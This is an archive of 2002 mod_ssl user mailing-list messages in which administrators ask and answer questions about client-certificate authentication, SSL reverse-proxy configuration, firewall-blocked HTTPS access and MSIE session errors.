Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 29 09:14:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA10062; Thu, 29 Aug 2002 09:13:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id JAA10050; Thu, 29 Aug 2002 09:12:46 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g7T7CTa24866
	for ; Thu, 29 Aug 2002 09:12:41 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Thu Aug 29 09:12:31 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 29 Aug 2002 09:12:26 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 29 Aug 2002 09:12:26 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 29 Aug 2002 09:12:26 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: availability of certificate info
Date: Thu, 29 Aug 2002 09:12:25 +0200
Message-ID: 
Thread-Topic: availability of certificate info
Thread-Index: AcJPK22CoMT9VqrbRgy8UsQNacMb/g==
X-Priority: 1
Importance: high
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 29 Aug 2002 07:12:26.0475 (UTC) FILETIME=[6DD663B0:01C24F2B]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAB10056
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all

I'm trying to setup Apache talking to OpenLdap using certificates via
a module called mod_authz_ldap through the SSL port, using mod_ssl.

While I haven't entirely gotten that to work, I'm trying to determine
out of that setup if it is possible to:

- When a user authenticates himself to the site using his/her
certificate, is it possible to access the certificate's info that is
being sent to the openldap database, through a servlet??

This might not be the right list, but since one of the components is
modssl related I thought I would give it a try.

Any pointers are appreciated.

Best regards
Jose Correia
Isis
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 29 10:19:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA12222; Thu, 29 Aug 2002 10:18:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id KAA12211; Thu, 29 Aug 2002 10:17:15 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g7T8H7a23940
	for ; Thu, 29 Aug 2002 10:17:08 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Thu Aug 29 10:17:11 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 29 Aug 2002 10:17:06 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 29 Aug 2002 10:17:06 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 29 Aug 2002 10:17:02 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: availability of certificate info
Date: Thu, 29 Aug 2002 10:17:02 +0200
Message-ID: 
Thread-Topic: availability of certificate info
Thread-Index: AcJPK22CoMT9VqrbRgy8UsQNacMb/gACKDBQ
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 29 Aug 2002 08:17:02.0781 (UTC) FILETIME=[744BBED0:01C24F34]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA12218
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Btw my versions are:

apache: 1.3.20
mod-ssl: 2.8.4
mod-authz-ldap: 0.20
openldap: 2.1.3
Tomcat: 3.2.1 initially

Also (as seen above) my servlet would be loaded through Tomcat talking
to Apache.

Regards
Jose


-----Original Message-----
From: Jose Correia (J) 
Sent: 29 August 2002 09:12
To: modssl-users@modssl.org
Subject: availability of certificate info
Importance: High


Hi all

I'm trying to setup Apache talking to OpenLdap using certificates via
a module called mod_authz_ldap through the SSL port, using mod_ssl.

While I haven't entirely gotten that to work, I'm trying to determine
out of that setup if it is possible to:

- When a user authenticates himself to the site using his/her
certificate, is it possible to access the certificate's info that is
being sent to the openldap database, through a servlet??

This might not be the right list, but since one of the components is
modssl related I thought I would give it a try.

Any pointers are appreciated.

Best regards
Jose Correia
Isis
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 29 10:23:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA12416; Thu, 29 Aug 2002 10:22:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id KAA12327; Thu, 29 Aug 2002 10:21:07 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id KAA04848
	for ; Thu, 29 Aug 2002 10:20:53 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA13220
	for ; Thu, 29 Aug 2002 10:20:53 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: Usefull error pages for users
Date: Thu, 29 Aug 2002 10:20:52 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24A01EE022E@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Usefull error pages for users
Thread-Index: AcJOqdxzZSE+FFJjThKXKWLgEC6EYQAio5DQ
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA12401
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The SSL session is established *before* any HTTP traffic takes place. If the session fails to be set up, the client cannot send any request through to apache, which operates at the HTTP layer. So the server isn't really aware that any request was made and so can't very well generate a response...

I think you'd have to hack into the mod_ssl code to achieve this.

Rgds,

Owen Boyle 

>-----Original Message-----
>From: Danny Kruitbosch [mailto:d.kruitbosch@rdc.nl]
>Sent: Mittwoch, 28. August 2002 11:00
>To: modssl-users
>Subject: Usefull error pages for users
>
>
>Hi,
>
>I'm trying to figure out the following:
>
>We're using client certs for authentication and the 
>authentication works 
>fine. But when a user connect and isn't able to present his 
>cert of his 
>cert is revoked he gets an 'DNS or server error' (IE 5.5/6.0). I would 
>like to redirect this user to a custom error page saying something 
>intelligent like:
>
>"Certificate revoked"
>"No certificate presented"
>"Unable to verify certificate"
>
>or server specific errors like:
>
>CRL expired
>Unable to verify certificate
>
>
>How can I set this up?
>(Is there a list of specific error codes SSL uses and can I use the 
>ErrorDocument directive on this. If so where do I find this 
>list of SSL 
>error codes)
>
>Thanks,
>
>Danny
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 29 12:25:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA16085; Thu, 29 Aug 2002 12:24:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from raq76.uk2net.com.local id MAA16080; Thu, 29 Aug 2002 12:23:23 +0200 (MET DST)
Received: from comice ([62.189.189.147])
	by raq76.uk2net.com.local (8.9.3/8.9.3) with ESMTP id LAA07087
	for ; Thu, 29 Aug 2002 11:23:16 +0100
From: "Jeff AA" 
To: 
Subject: RE: Usefull error pages for users
Date: Thu, 29 Aug 2002 11:23:23 +0100
Message-ID: <000401c24f46$1b2fd5e0$3864a8c0@comice>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-reply-to: <14D1193E30E0894D8A773957C0AEE24A01EE022E@SOMEXEVS001.ex.ordersx.org>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff AA" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


You can accomplish the desired error message effect like so:
in your httpd.conf
  SSLVerifyClient  optional

Then write a handler to protect all your pages/images that checks the
client certificate for whatever details you want to test, and redirects
to a page with the error message that you want to display, or allows the
access to proceed.

I'm not sure what happens when the cert is expired, the CRL is out of
date etc, as this will get checked before your handler - testing will
tell you this, but at least you will be able to tell folks with no
client cert that they have to get one!

Such a handler would be a cinch in mod_perl - why not ask in the
mod_perl lists, there might already be such a CPANish beastie. Or cut
your own in PHP, Java etc.

Regards
Jeff


> -----Original Message-----
> From: owner-modssl-users@modssl.org 
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Boyle Owen
> Sent: 29 August 2002 09:21
> To: modssl-users@modssl.org
> Subject: RE: Usefull error pages for users
> 
> 
> The SSL session is established *before* any HTTP traffic 
> takes place. If the session fails to be set up, the client 
> cannot send any request through to apache, which operates at 
> the HTTP layer. So the server isn't really aware that any 
> request was made and so can't very well generate a response...
> 
> I think you'd have to hack into the mod_ssl code to achieve this.
> 
> Rgds,
> 
> Owen Boyle 
> 
> >-----Original Message-----
> >From: Danny Kruitbosch [mailto:d.kruitbosch@rdc.nl]
> >Sent: Mittwoch, 28. August 2002 11:00
> >To: modssl-users
> >Subject: Usefull error pages for users
> >
> >
> >Hi,
> >
> >I'm trying to figure out the following:
> >
> >We're using client certs for authentication and the 
> >authentication works 
> >fine. But when a user connect and isn't able to present his 
> >cert of his 
> >cert is revoked he gets an 'DNS or server error' (IE 
> 5.5/6.0). I would 
> >like to redirect this user to a custom error page saying something 
> >intelligent like:
> >
> >"Certificate revoked"
> >"No certificate presented"
> >"Unable to verify certificate"
> >
> >or server specific errors like:
> >
> >CRL expired
> >Unable to verify certificate
> >
> >
> >How can I set this up?
> >(Is there a list of specific error codes SSL uses and can I use the 
> >ErrorDocument directive on this. If so where do I find this 
> >list of SSL 
> >error codes)
> >
> >Thanks,
> >
> >Danny
> >
> >_____________________________________________________________
> _________
> >Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> >User Support Mailing List                     
>  modssl-users@modssl.org
> >Automated List Manager                            
> majordomo@modssl.org
> >
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 29 15:44:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA20338; Thu, 29 Aug 2002 15:43:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.sogei.it id PAA20328; Thu, 29 Aug 2002 15:42:35 +0200 (MET DST)
Received: from hermes.sogei.it (hermes.sogei.it [26.2.193.51])
          by mail.sogei.it (8.11.4/8.8.4) with ESMTP
	  id g7TAQID12674 for ; Thu, 29 Aug 2002 12:26:19 +0200
Received: from ccampetto2000 ([26.2.103.56])
          by hermes.sogei.it (Lotus Domino Release 5.0.9a)
          with SMTP id 2002082915413354:4356 ;
          Thu, 29 Aug 2002 15:41:33 +0200 
From: "Claudio Campetto" 
To: "modssl mailinglist" 
Subject: I: Apache 2.0.39 SSLProxy - can't authenticate to a remote server
Date: Thu, 29 Aug 2002 15:48:38 +0200
Message-ID: 
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Importance: Normal
X-MIMETrack: Itemize by SMTP Server on Hermes/Sogei(Release 5.0.9a |January 7, 2002) at
 29/08/2002 15.41.33,
	Serialize by Router on Hermes/Sogei(Release 5.0.9a |January 7, 2002) at 29/08/2002
 15.41.42,
	Serialize complete at 29/08/2002 15.41.42
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Claudio Campetto" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,
I'have already posted this message to the Apache users list, but since it is
a mod-ssl related problem I try here too.
I'm trying to configure apache as a SSL reverse proxy (i.e. http from
browser to apache and https from apache to the remote server); everything
works fine if no client authentication is required by the server. When I
turn on client autentication on the server, the apache proxy process serving
the request get a segmentation fault. I've read the documentation that comes
with apache2, but the SSLProxy directives are not so clear to understand.
For example, in order to authenticate to a server, a proxy needs a key pair
(and a certificate, of course) but no directive is available to specify a
key; I tried SSLCertificateFile and SSLCertificateKeyFile but these are only
used if SSLEngine is on, which provokes the proxy speak SSL to clients, and
doesn't resolve the problem anyway. If SSLEngine is off, apache doesn't even
ask for the key file password. Here is the relevant section of the
configuration file:


AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl
SSLPassPhraseDialog  builtin
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300
SSLMutex  file:logs/ssl_mutex
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

##
## SSL Virtual Host Context
##



ServerName claudio.sogei.it:80
SSLProxyEngine on
SSLCertificateFile /usr/local/apache2/conf/ssl.crt/client.crt
SSLCertificateKeyFile /usr/local/apache2/conf/ssl.key/client.key
ProxyRequests On
ProxyPass / https://ccampetto1.sogei.it/
SSLProxyMachineCertificateFile
/usr/local/apache2/conf/ssl.crt/clientcertkey.crt




Maybe I missed something. Can anybody enligthen me?
Thanks in advance.
Claudio Campetto.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 29 19:44:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA25474; Thu, 29 Aug 2002 19:43:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA25470; Thu, 29 Aug 2002 19:42:57 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id AB7614CE734; Thu, 29 Aug 2002 19:42:56 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 582F3286BA; Thu, 29 Aug 2002 19:36:53 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from usilms55.ca.com id TAA25419; Thu, 29 Aug 2002 19:32:27 +0200 (MET DST)
Received: from usilms21.ca.com ([141.202.201.21]) by usilms55.ca.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 29 Aug 2002 13:22:32 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C24F80.A8A0CE44"
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Subject: SSL on Apache 1.3.26 running Redhat Linux 7.3
Date: Thu, 29 Aug 2002 13:22:32 -0400
Message-ID: <8C6B052884783549B5D30C166853A514353589@usilms21.ca.com>
Thread-Topic: SSL on Apache 1.3.26 running Redhat Linux 7.3
Thread-Index: AcJPgT+0YYGhurkWEdaDQgBgCCC99g==
From: "Bao, Xiliang" 
To: 
X-OriginalArrivalTime: 29 Aug 2002 17:22:32.0490 (UTC) FILETIME=[A8B900A0:01C24F80]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bao, Xiliang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C24F80.A8A0CE44
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi:

I have installed Apache 1.3.26 with SSL enabled in Redhat Linux 7.3 =
machine. I can connect to both port 80 and 443 on local browser, but can =
only connect to port 80 from my NT workstation. Does any one has idea on =
what's going wrong with my setting? I am thinking that it is Linux's =
system setting made this problem.

Any hint will be highly appreciated.

    _/_/_/_/  _/   Steve Bao
   _/       _/_/  =20
  _/      _/  _/  =20
 _/     _/_/_/_/   Tel: (858) 625-6964
_/_/_/_/      _/   Fax: (858) 453-2816


------_=_NextPart_001_01C24F80.A8A0CE44
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






SSL on Apache 1.3.26 running Redhat Linux 7.3





Hi:




I have installed Apache 1.3.26 with SSL =
enabled in Redhat Linux 7.3 machine. I can connect to both port 80 and =
443 on local browser, but can only connect to port 80 from my NT =
workstation. Does any one has idea on what's going wrong with my =
setting? I am thinking that it is Linux's system setting made this =
problem.



Any hint will be highly =
appreciated.




    _/_/_/_/  _/   Steve Bao


   _/       =
_/_/   


  =
_/      _/  _/   


 _/     _/_/_/_/   Tel: (858) 625-6964


_/_/_/_/      _/   Fax: (858) 453-2816





------_=_NextPart_001_01C24F80.A8A0CE44--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 29 22:49:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00046; Thu, 29 Aug 2002 22:48:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bocfg3.chevrontexaco.com id WAA00040; Thu, 29 Aug 2002 22:48:12 +0200 (MET DST)
Received: from bocntmf1.boc.chevrontexaco.net (bocntmf1.boc.chevrontexaco.net [136.171.125.82])
	by bocfg3.chevrontexaco.com (8.12.5/8.12.5) with ESMTP id g7TKm37j004333;
	Thu, 29 Aug 2002 15:48:04 -0500 (CDT)
Received: from 146.22.111.10 by bocntmf1.boc.chevrontexaco.net with
 ESMTP (ChevronTexaco SMTP Mail Filter BAMF1 (MMS v5.0)); Thu, 29 Aug
 2002 15:47:53 -0500
X-Server-Uuid: 82F78E32-0EC9-4375-A45B-25D42066D996
Received: by hou281-msxb1.chevron.com with Internet Mail Service (
 5.5.2650.21) id ; Thu, 29 Aug 2002 15:47:54 -0500
Message-ID: <53D65D67C6AA694284F7584E25ADD354333239@nor935nte2k1.nor935.chevrontexaco.net>
From: "Ladner, Eric (Eric.Ladner)" 
To: "'modssl-users@modssl.org'" 
cc: "'Xiliang.Bao@ca.com'" 
Subject: RE: SSL on Apache 1.3.26 running Redhat Linux 7.3
Date: Thu, 29 Aug 2002 15:47:50 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
X-WSS-ID: 117057F31608141-01-01
Content-Type: multipart/alternative;
 boundary="----_=_NextPart_001_01C24F9D.56F5FE63"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ladner, Eric (Eric.Ladner)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C24F9D.56F5FE63
Content-Type: text/plain;
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit

firewall settings maybe?
 
Try /etc/rc.d/init.d/ipchains stop and /etc/rc.d/init.d/iptables stop and
see if it starts working from the NT box.  If it does, you need adjust the
firewall settings for ipchains or iptables (whichever you configured at
install time).
 
Eric

-----Original Message-----
From: Bao, Xiliang [mailto:Xiliang.Bao@ca.com]
Sent: Thursday, August 29, 2002 12:23 PM
To: modssl-users@modssl.org
Subject: SSL on Apache 1.3.26 running Redhat Linux 7.3



Hi: 

I have installed Apache 1.3.26 with SSL enabled in Redhat Linux 7.3 machine.
I can connect to both port 80 and 443 on local browser, but can only connect
to port 80 from my NT workstation. Does any one has idea on what's going
wrong with my setting? I am thinking that it is Linux's system setting made
this problem.

Any hint will be highly appreciated. 

    _/_/_/_/  _/   Steve Bao 
   _/       _/_/   
  _/      _/  _/   
 _/     _/_/_/_/   Tel: (858) 625-6964 
_/_/_/_/      _/   Fax: (858) 453-2816 


------_=_NextPart_001_01C24F9D.56F5FE63
Content-Type: text/html;
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit




SSL on Apache 1.3.26 running Redhat Linux 7.3




firewall settings 
maybe?


 


Try /etc/rc.d/init.d/ipchains 
stop and /etc/rc.d/init.d/iptables stop and see if it starts working from the NT 
box.  If it does, you need adjust the firewall settings for ipchains or 
iptables (whichever you configured at install time).


 


Eric



  
-----Original 
  Message-----
From: Bao, Xiliang 
  [mailto:Xiliang.Bao@ca.com]
Sent: Thursday, August 29, 2002 12:23 
  PM
To: modssl-users@modssl.org
Subject: SSL on Apache 
  1.3.26 running Redhat Linux 7.3


  
Hi: 

  
I have installed Apache 1.3.26 with SSL enabled in 
  Redhat Linux 7.3 machine. I can connect to both port 80 and 443 on local 
  browser, but can only connect to port 80 from my NT workstation. Does any one 
  has idea on what's going wrong with my setting? I am thinking that it is 
  Linux's system setting made this problem.

  
Any hint will be highly appreciated. 

  
    
  _/_/_/_/  _/   Steve Bao 
   _/       _/_/   
  _/      _/  _/   
 _/     _/_/_/_/   Tel: (858) 625-6964 
_/_/_/_/      _/   Fax: (858) 453-2816 


------_=_NextPart_001_01C24F9D.56F5FE63--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 30 14:19:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA18245; Fri, 30 Aug 2002 14:18:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nixpbe.pdb.sbs.de id OAA18241; Fri, 30 Aug 2002 14:18:00 +0200 (MET DST)
Received: from trolli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.97.20] (may be forged))
	by nixpbe.pdb.sbs.de (8.11.6/8.11.2) with ESMTP id g7UCHre22321
	for ; Fri, 30 Aug 2002 14:17:53 +0200
Received: from deejai2.mch.fsc.net (deejai2.mch.fsc.net [172.25.124.236])
	by trolli.pdb.fsc.net (8.11.6/8.11.6) with ESMTP id g7UCHrE15096
	for ; Fri, 30 Aug 2002 14:17:53 +0200
Received: (from root@localhost)
	by deejai2.mch.fsc.net (8.12.5/8.12.4) id g7UCHs65036331
	for modssl-users@modssl.org; Fri, 30 Aug 2002 14:17:54 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: from deejai2.mch.fsc.net (localhost [127.0.0.1])
	by deejai2.mch.fsc.net (8.12.5/8.12.5) with ESMTP id g7UCHpru036320
	for ; Fri, 30 Aug 2002 14:17:51 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: (from martin@localhost)
	by deejai2.mch.fsc.net (8.12.5/8.12.5/Submit) id g7UCHp03036319
	for modssl-users@modssl.org; Fri, 30 Aug 2002 14:17:51 +0200 (CEST)
Date: Fri, 30 Aug 2002 14:17:51 +0200
From: Martin Kraemer 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.10
Message-ID: <20020830141751.C28362@deejai2.mch.fsc.net>
References: <20020624112441.GA58380@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020624112441.GA58380@engelschall.com>; from rse@engelschall.com on Mon, Jun 24, 2002 at 01:24:41PM +0200
X-Operating-System: FreeBSD 4.6-STABLE FreeBSD 4.6-STABLE
X-Organization: Fujitsu Siemens Computers (Muenchen, Germany)
X-Disclaimer: THE COMMENTS CONTAINED IN THIS MESSAGE REFLECT THE VIEWS OF THE  WRITER AND ARE NOT NECESSARILY THE VIEWS OF FUJITSU-SIEMENS COMPUTERS
X-No-Junk-Mail: I do not want to get *any* junk mail.
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin Kraemer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Zum Thema Security und so:
Ich habe gesehen, dass seit 67 Tagen keine Datei im mod_ssl Repository
(so, wie es per rsync geliefert wird) mehr modifiziert wurde.

Ist das aus Sicherheitsgruenden, oder hat sich das Repository tatsaechlich
nicht veraendert?

Gruss,
  Martin
-- 
         |     Fujitsu Siemens
Fon: +49-89-636-46021, FAX: +49-89-636-47655 | 81730  Munich,  Germany
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 30 16:29:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20381; Fri, 30 Aug 2002 16:28:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from aeshna.cynapsis.cy id QAA20373; Fri, 30 Aug 2002 16:27:27 +0200 (MET DST)
Received: from grover by aeshna.cynapsis.cy with local (Exim 3.16 #1)
	id 17kmk4-0004Yw-00
	for modssl-users@modssl.org; Fri, 30 Aug 2002 16:27:20 +0200
Date: Fri, 30 Aug 2002 16:27:20 +0200
From: Christoph Gröver 
To: modssl-users@modssl.org
Subject: Re: MSIE Bugs, Summary available ?
Message-Id: <20020830162720.14911a1a.grover@sitepark.com>
In-Reply-To: <20020822163057.3dcb50f8.grover@sitepark.com>
References: <20020822142241.7c30045e.grover@sitepark.com>
	<3D64E374.3040004@itaction.co.uk>
	<20020822163057.3dcb50f8.grover@sitepark.com>
Organization: Sitepark GmbH
X-Mailer: Sylpheed version 0.7.8 (GTK+ 1.2.10; i586-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christoph Gröver 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hello Peter Viertel. Hello Others.

Increasing the session timeout actually helped with the problem that
after the users have filled in a form they get the MSIE error.
Thank you for this suggestion.

This was the most annyoing part, because people had to refill the 
fields.


But still we/our customers do get spontaneous errors with MSIE.
Sometimes the first request, sometimes it takes up to 15 minutes
before it happens.

Well, we keep trying ;-).

Bye
-- 
Christoph Gröver, grover@sitepark.com
Sitepark, Gesellschaft für Informationsmanagement mbH
Rothenburg 14-16, D-48143 Münster, Telefon (0251) 48265-50
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

